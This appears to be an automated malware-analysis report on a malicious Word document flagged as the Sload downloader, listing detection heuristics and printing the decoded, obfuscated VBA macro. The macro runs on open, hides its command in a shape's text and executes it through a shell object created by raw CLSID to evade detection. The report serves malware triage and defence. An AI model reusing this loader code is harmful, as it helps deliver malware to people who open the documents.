MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample contains VBA macros that leverage the `WScript.Shell` COM object to execute obfuscated commands via `cmd.exe` and `powershell.exe`. The script attempts to download and execute a second-stage payload, indicated by the embedded URL and the suspicious command-line arguments. The use of AutoOpen macro and the invocation of cmd.exe and PowerShell are strong indicators of malicious intent.
Heuristics 10
-
ClamAV: Doc.Malware.Sload-6777087-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sload-6777087-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
Set zpFjRBW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQMwOzw) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set zpFjRBW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQMwOzw) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7603 bytes |
SHA-256: 80532583611be84b4ded96c42ad949b9959910c190a977a4225b12123859c30a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
115 of 179 identifiers look randomly generated (e.g. 'iInmDTjaNzv') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iInmDTjaNzv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case qSFiFV
Case 176593762
RkjqtU = Hex(jDcIW)
UKpACCuqP = Cos(78931746)
WzzUHiJzr = 123866763
Case 124231645
iIjvbtd = Hex(iXSVHQ)
DSjVBYt = Sqr(129297158 / CSng(317194285 - Cos(147563730 - 211019213) + USJijCh + Rnd(44056466 - 285617669)))
HTwmuM = Hex(fcMqEGjLz)
End Select
On Error Resume Next
Select Case OWPZG
Case 123802421
zWvltjwZZ = Hex(oziEl)
KGPjzDfC = Cos(257063776)
zTziDfjZ = 44567978
Case 221779699
FUrRX = Hex(tmEnC)
mFSqmut = Sqr(285893376 / CSng(295667817 - Cos(333459047 - 71990123) + daqBJPJz + Rnd(26382225 - 201521290)))
mYPaw = Hex(PivvqNdl)
End Select
On Error Resume Next
Select Case YJjnPuJk
Case 153121641
EtiXizjpa = Hex(rJWLCvjp)
NNbVluFF = Cos(29281143)
YcAwzPq = 141918544
Case 157170618
pmRncz = Hex(nUlTKU)
KfdYt = Sqr(196387076 / CSng(192712795 - Cos(307972471 - 203113868) + BIrNYv + Rnd(75428042 - 174033635)))
Xuavos = Hex(iRkSJNIz)
End Select
On Error Resume Next
Select Case qCYjcC
Case 74160807
QOKsCizmW = Hex(dkvCzTObI)
hvhOGQ = Cos(296776916)
GYWJzSma = 271880502
Case 336084506
XLGbWFP = Hex(oFESBtu)
Vjwlmp = Sqr(71830139 / CSng(211613722 - Cos(329687637 - 163035359) + lcPXiP + Rnd(16858626 - 246937385)))
aTLJr = Hex(FhBGUPEHR)
End Select
Set ppnZv = Shapes("QqIUpbiD")
On Error Resume Next
Select Case YCaIUWfci
Case 302944051
sYCizskD = Hex(ptmhpNW)
jFwpHVKi = Cos(15537758)
hJCvA = 230079606
Case 69565347
irbpohTrJ = Hex(QtSHAvvZ)
wkDsAujDt = Sqr(176962448 / CSng(301326538 - Cos(291694381 - 20956679) + qiiJrQP + Rnd(145582510 - 107026275)))
iRIqZJ = Hex(zalOO)
End Select
On Error Resume Next
Select Case nmsIMAqzV
Case 145706481
OzcrDIzzi = Hex(uWdAdh)
wwzNUjMsq = Cos(260319119)
kFCbUJXPU = 322612991
Case 113804233
TGJatPOI = Hex(TvwXWitT)
wNUwMY = Sqr(117589001 / CSng(125228753 - Cos(15154373 - 136004325) + ONwhLfG + Rnd(76991288 - 41597964)))
cbiRRK = Hex(Ewadw)
End Select
zkqPqPEG = "" + SVukI + tfTFwQ + chMwVlpj + ppnZv.TextFrame.TextRange.Text + NODuzS + dsKMa
On Error Resume Next
Select Case iSwOR
Case 341340570
bipUEWO = Hex(FNXUpNDd)
vYcELC = Cos(18288008)
UzVXmW = 224753650
Case 174426422
UONOwCwcP = Hex(jhstf)
fStXUQfm = Sqr(52473220 / CSng(237973600 - Cos(151638143 - 300756351) + Trours + Rnd(271479315 - 101128090)))
zWjbv = Hex(VibFq)
End Select
On Error Resume Next
Select Case wlNUXfcjd
Case 222675151
YWwiR = Hex(JVoGzcMMi)
wzjYtJL = Cos(129459040)
wNEjUYIA = 152760006
Case 188780820
rZGTz = Hex(LlzJBI)
JdjuJGOK = Sqr(191839566 / CSng(327543468 - Cos(123613120 - 220592647) + lUiqb + Rnd(269092684 - 235791724)))
iZtPbiwa = Hex(awFOaq)
End Select
On Error Resume Next
Select Case ilRLi
Case 232345182
LdDNz = Hex(jVrwlMim)
ffOfUkmm = Cos(218372567)
DZhCif = 214669908
Case 36710983
cSjii = Hex(QXmuprRV)
FlzDOTYqW = Sqr(339979559 / CSng(314656958 - Cos(47136418 - 10676961) + JQEGjJ + Rnd(90010404 - 312629450)))
jzDMA = Hex(rVlDjwzid)
End Select
On Error Resume Next
Select Case RYPwQaLw
Case 247483045
PwIzM = Hex(QGmPUXQ)
GEfVW = Cos(280939674)
zPnbQZs = 222667677
Case 11454302
KbUwo = Hex(ksRVWNtT)
IGrLvqZui = Sqr(119084423 / CSng(216616246 - Cos(143458019 - 158929839) + DYYkJJwwM + Rnd(118741274 - 121986413)))
dEUDkVThI = Hex(AVGPkj)
End Select
On Error Resume Next
Select Case khHvlEjKo
Case 327114310
FERKB = Hex(MMfwoC)
PGhAza = Cos(59040453)
zilviQ = 293455400
Case 247517069
ZjYmJtnTi = Hex(uLftwisf)
WjMOotH = Sqr(172737929 / CSng(213112172 - Cos(99212125 - 124681621) + UbmYE + Rnd(200867014 - 189808307)))
NtjPq = Hex(ASkpQq)
End Select
Set zpFjRBW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQMwOzw)
On Error Resume Next
Select Case VjJzDHtUX
Case 18897691
ilvjvjmZE = Hex(jsnhw)
mmlZUOGlS = Cos(51671107)
ZVnLvfmRj = 114746456
Case 30553963
TQocppnVS = Hex(MGhlc)
UfJRnlM = Sqr(28140398 / CSng(116834274 - Cos(296290303 - 239254800) + AQRdin + Rnd(122557321 - 63895743)))
lRvimdUI = Hex(dKCJwBHn)
End Select
On Error Resume Next
Select Case OVKiavzpj
Case 221132927
LPrRj = Hex(DZZYrGp)
wZYqKK = Cos(25050622)
NnNWMwJK = 322692278
Case 176774328
wNLlo = Hex(kChWXXP)
SdWYwZX = Sqr(321693798 / CSng(170115082 - Cos(9599548 - 24949137) + JSGQP + Rnd(182175281 - 108129704)))
szlok = Hex(ZHWPqQ)
End Select
On Error Resume Next
Select Case AHHLF
Case 52629287
JlZYZFzUA = Hex(ZcwtdE)
HodTrnjKR = Cos(177297043)
WtEVCRiV = 232654319
Case 5709937
XfIOJT = Hex(cMWDODQi)
RzpOHiJ = Sqr(327815452 / CSng(49306926 - Cos(68893772 - 26929633) + hPIUrsR + Rnd(329664313 - 69038397)))
iPcpORT = Hex(AEYqMXt)
End Select
On Error Resume Next
Select Case FsaXDSBpb
Case 198789829
ipQFEtcG = Hex(ZaEQTo)
QXzotUU = Cos(304001646)
QfhID = 314956561
Case 324917293
TrpjPpXad = Hex(PfoJEOslR)
pmKVVvo = Sqr(91034715 / CSng(310936736 - Cos(331512196 - 89200067) + cGzcwqA + Rnd(221364631 - 188067519)))
PdEOVG = Hex(SQSdVIj)
End Select
Const rVrIS = 0
On Error Resume Next
Select Case ouBKZL
Case 267343171
jfQdhYO = Hex(TiNCHsX)
jjLWdjia = Cos(209682394)
batQK = 303397753
Case 44012612
oLnnt = Hex(KiPJW)
GvXSa = Sqr(297750185 / CSng(64046 - Cos(117659341 - 315801623) + zpzcz + Rnd(261847519 - 239648332)))
XTvFE = Hex(vwnEMz)
End Select
On Error Resume Next
Select Case upFEnBI
Case 327947516
sDKLwjJE = Hex(MPnsmkwfd)
AbNZZ = Cos(237618905)
Pqfkk = 118979471
Case 210404175
rFDuaXq = Hex(HlqiBD)
GHXCwNf = Sqr(196367284 / CSng(243951550 - Cos(179644608 - 321163522) + SYFbzH + Rnd(106782011 - 306771080)))
ulCjJPF = Hex(jBAMVZdM)
End Select
zpFjRBW.Run# zkqPqPEG, rVrIS
On Error Resume Next
Select Case HrzvRn
Case 253475972
thwcnb = Hex(LDkanjDvn)
VXJLA = Cos(214466582)
RlTXk = 187051212
Case 231717698
QLYriIobl = Hex(WfcriDvJ)
vQcFtBtKB = Sqr(49048105 / CSng(144659092 - Cos(177219579 - 175907146) + jWXfE + Rnd(35559187 - 298468547)))
vYfdBaZH = Hex(cainio)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.